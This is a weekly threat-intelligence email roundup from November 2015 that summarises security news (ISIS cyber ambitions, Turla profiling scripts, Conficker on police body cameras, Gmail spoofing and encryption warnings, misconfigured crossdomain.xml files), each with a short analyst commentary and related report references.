The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.
Tuesday, 17 November 2015
ISLAMIC STATE IS PLANNING DEADLY CYBER ATTACKS
FROM THE MEDIA
According to UK Chancellor George Osborne, Islamic State militants are trying to develop the ability to execute attacks on UK infrastructure such as air traffic control and hospitals. Osborne noted that the Government Communications Headquarters is monitoring threats to 450 companies in energy, defense and water supply. Furthermore, he plans to double UK funding to fight cyber crime.
Read the Story: BBC
iSIGHT PARTNERS ANALYST COMMENT
While we still have not observed public acknowledgement from official ISIS representatives that the organization possesses a cyber capability, we believe that ISIS is conducting cyber threat activity on a limited basis. Targeting critical infrastructure assets would likely be of interest to ISIS, given the significant potential impact of a successful compromise; however, we have observed no evidence that ISIS cyber threat actors are capable of compromising critical infrastructure systems. It is possible that ISIS could develop such a capability if it elects to devote sufficient resources to do so.
RELATED iSIGHT PARTNERS REPORTS
15-00009824 (Pro-ISIS Hacktivism Overview), 16 Oct. 2015
15-00012766 (Hacktivist Reactions to Paris Terror Attacks Likely; Anonymous-Affiliated Actors Discuss Anti-ISIS Campaign #OpParis), 15 Nov. 2015
15-00011902 (Operational Net Assessment of Hacktivist Threats – July to September 2015), 26 Oct. 2015
STATE SPONSORED CYBER SPIES INJECT VICTIM PROFILING AND TRACKING SCRIPTS IN STRATEGIC WEBSITES
FROM THE MEDIA
FireEye researchers have discovered a campaign that is using computer tracking and profiling scripts. The scripts were found injected into over 100 websites visited by diplomats, academic researchers, government officials and business executives. Since no malicious scripts have been dispersed via the profiling scripts, the objective of the campaign is likely to identify unique users for later targeting.
Read the Story: IT World
iSIGHT PARTNERS ANALYST COMMENT
This campaign refers to activity we reported in early 2015 that exemplified Turla Team’s advanced profiling operations and high level of sophistication. In this case, we identified more than 100 sites related to diplomacy, the defense industrial base, and media outlets that used Google shortened URLs within the JavaScript to direct victims to a profiling site, which placed a strongly persistent evercookie on redirected victims’ machines to track targets of interest.
RELATED iSIGHT PARTNERS REPORTS
15-00000512 (Turla Team Uses Evercookies), 31 March 2015
15-00001032 (Turla Team Watering Hole Campaign), 9 March 2015
15-00009892 (Overview of Turla Team), 31 Sept. 2015
OLD-SCHOOL CONFICKER VIRUS TO INFECT POLICE BODY CAMS
FROM THE MEDIA
The Conficker worm has been discovered pre-installed on two Frontline police body cameras. The virus was discovered on the Martel Electronics body cameras while researchers were testing two of the devices. The virus immediately started to spread to other machines within the lab testing the devices.
Read the Story: ZDNet
iSIGHT PARTNERS ANALYST COMMENT
This is not the first time Conficker has been observed spreading via portable devices that attach to PCs. In 2011, an Australian security organization reported that Conficker was installed onto a device sold at an Aldi store in Australia. In that case, and in the current incident, the malware was likely installed at some point in manufacturing via an infected device used for production or testing. Organizations involved in manufacturing or development should take steps to ensure that their supply and production capabilities are secure to avoid this type of incident, and where possible all organizations should test new hardware to ensure it has not been compromised prior to deployment.
RELATED iSIGHT PARTNERS REPORTS
Intel-442307 (Hard Drives from Australian Store Spreading Conficker Worm), 10 Aug. 2011
15-00003756 (Overview of Methods for Real-Time Control of Air-Gapped Systems), 8 May 2015 ThreatScape Media Highlights (Lenovo ThinkPad PCs Come With Pre-installed User Data Collection Software), 28 Sept. 2015
BUG IN GMAIL APP FOR ANDROID ALLOWS YOU TO SEND EMAILS PRETENDING TO BE SOMEONE ELSE
FROM THE MEDIA
A flaw in the Android Gmail app can allow a user to send e-mails purporting to be from someone else. This e-mail spoofing is enabled by altering e-mail headers. Security researcher Yan Zhu discovered the flaw and was able to alter her display name within the account settings. Google reportedly responded to the researcher that they did not consider the issue to be a security vulnerability.
Read the Story: Tech Worm
iSIGHT PARTNERS ANALYST COMMENT
We agree with Google that this Gmail app issue is not technically a security vulnerability. However, it can still be leveraged by attackers to perform email spoofing, which can be used to create more convincing spam or phishing campaigns. While this provides actors a new way to create spoofed emails, we are unaware of any reason that spoofed emails created using this method would pose any sort of unique threat beyond typical methods for creating spoofed emails.
RELATED iSIGHT PARTNERS REPORTS
15-00012060 (Potential Targeted Malware Infection Lures for November 2015), 29 Oct. 2015
15-00007560 (Russian-Speaking Actors Sell Job Site Databases; May Enable Multiple Types of eCrime Activities), 5 Aug. 2015
GMAIL TO SNITCH ON UNENCRYPTED MAIL SERVERS
FROM THE MEDIA
Google’s Gmail will warn users when a message arrives from plain text unencrypted connections. Google hopes to encourage providers to implement inbound and outbound message authentication and encryption. The migration comes after a study by the Universities of Michigan and Illinois on e-mail security evolvement since 2014.
Read the Story: IT News
iSIGHT PARTNERS ANALYST COMMENT
Google’s plans to warn users when incoming emails are sent unencrypted comes against the backdrop of a larger effort by information and communications technology companies to ensure the widespread adoption of communication encryption in order to boost overall security. While the notifications will not prevent malicious DNS servers from rerouting emails or nation states from tampering with SSL connection requests, they should help to raise public awareness and will likely encourage further adoption of encryption.
RELATED iSIGHT PARTNERS REPORTS
14-00000120 (Free Automated HTTPS Certificate Issuing Process ‘Let’s Encrypt’ Likely to Encrypt Malicious and Legitimate Web Traffic), 18 Dec. 2014
ThreatScape Media Highlights (Free of Charge SSL/TLS Certificates to be Available Next Month), 18 June 2015
10-10956 (Mozilla Firefox 3.6.6 SSL Common Name Wildcard Input Validation Vulnerability), 22 Jan. 2013
TEN-YEAR-OLD VULNERABILITY EXPOSES 6 PERCENT OF MOST POPULAR UK WEBSITES
FROM THE MEDIA
A ten-year-old vulnerability has been discovered in six percent of the 500 most visited UK websites. The vulnerability could allow an attacker to acquire sensitive user credentials. The vulnerability allows for open domain traffic in crossdomain.xml. The vulnerability has been found in sites belonging to financial services, healthcare providers and retailers.
Read the Story: SC Magazine
iSIGHT PARTNERS ANALYST COMMENT
By definition, a misconfiguration is not a vulnerability. However, attackers can still leverage misconfigured cross domain files for malicious activity. While the full extent of websites that are susceptible to such attacks remains uncertain, we do not expect this issue to pose a significant threat in the long term. Only a small number of websites (30) have been identified running misconfigured files, and even if an attacker identified which websites are susceptible to attack, the information they potentially could access would depend on the users they trick into opening a specially crafted Flash file. Therefore, unless the attacker is able to craft and deliver the files to targeted users, conducting the attack may not be fruitful.
RELATED iSIGHT PARTNERS REPORTS
15-00012792 (Weekly Vulnerability Exploitation Report), 16 Nov. 2015
Intel-1346271 (Cyber Espionage Operators Breached Anthem, Inc. in Long Running Campaign), 6 Nov. 2015
The post ThreatScape Media Highlights Update – Week Of November 17th appeared first on iSIGHT Partners.
